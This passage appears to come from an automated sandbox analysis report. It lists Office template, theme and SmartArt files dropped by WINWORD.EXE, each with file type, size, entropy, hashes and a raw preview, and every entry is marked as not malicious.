                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):3.484503080761839
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                                                                                                                                                SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                                                                                                                                                SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                                                                                                                                                SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9191
                                                                                                                                                                                                                                                                Entropy (8bit):7.93263830735235
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                                                                                                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                                                                                                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                                                                                                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                                                                                                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):260
                                                                                                                                                                                                                                                                Entropy (8bit):3.494357416502254
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                                                                                                                                                                SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                                                                                                                                                                SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                                                                                                                                                                SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6193
                                                                                                                                                                                                                                                                Entropy (8bit):7.855499268199703
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                                                                                                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                                                                                                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                                                                                                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                                                                                                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):274
                                                                                                                                                                                                                                                                Entropy (8bit):3.438490642908344
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                                                                                                                                MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                                                                                                                                                SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                                                                                                                                                SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                                                                                                                                                SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):34415
                                                                                                                                                                                                                                                                Entropy (8bit):7.352974342178997
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                                                                                                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                                                                                                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                                                                                                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                                                                                                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):570901
                                                                                                                                                                                                                                                                Entropy (8bit):7.674434888248144
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                                                                                                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                                                                                                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                                                                                                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                                                                                                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                                                Entropy (8bit):3.5459495297497368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                                                                                                                                                SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                                                                                                                                                SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                                                                                                                                                SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):523048
                                                                                                                                                                                                                                                                Entropy (8bit):7.715248170753013
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                                                                                                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                                                                                                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                                                                                                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                                                                                                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):276
                                                                                                                                                                                                                                                                Entropy (8bit):3.5159096381406645
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                                                                                                                                                SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                                                                                                                                                SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                                                                                                                                                SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):562113
                                                                                                                                                                                                                                                                Entropy (8bit):7.67409707491542
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                                                                                                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                                                                                                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                                                                                                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                                                                                                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):278
                                                                                                                                                                                                                                                                Entropy (8bit):3.535736910133401
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                                                                                                                                                SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                                                                                                                                                SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                                                                                                                                                SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):558035
                                                                                                                                                                                                                                                                Entropy (8bit):7.696653383430889
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                                                                                                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                                                                                                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                                                                                                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                                                                                                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):276
                                                                                                                                                                                                                                                                Entropy (8bit):3.5361139545278144
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                                                                                                                                                SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                                                                                                                                                SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                                                                                                                                                SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):777647
                                                                                                                                                                                                                                                                Entropy (8bit):7.689662652914981
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                                                                                                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                                                                                                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                                                                                                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                                                                                                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                                                                                                                                Malicious:false
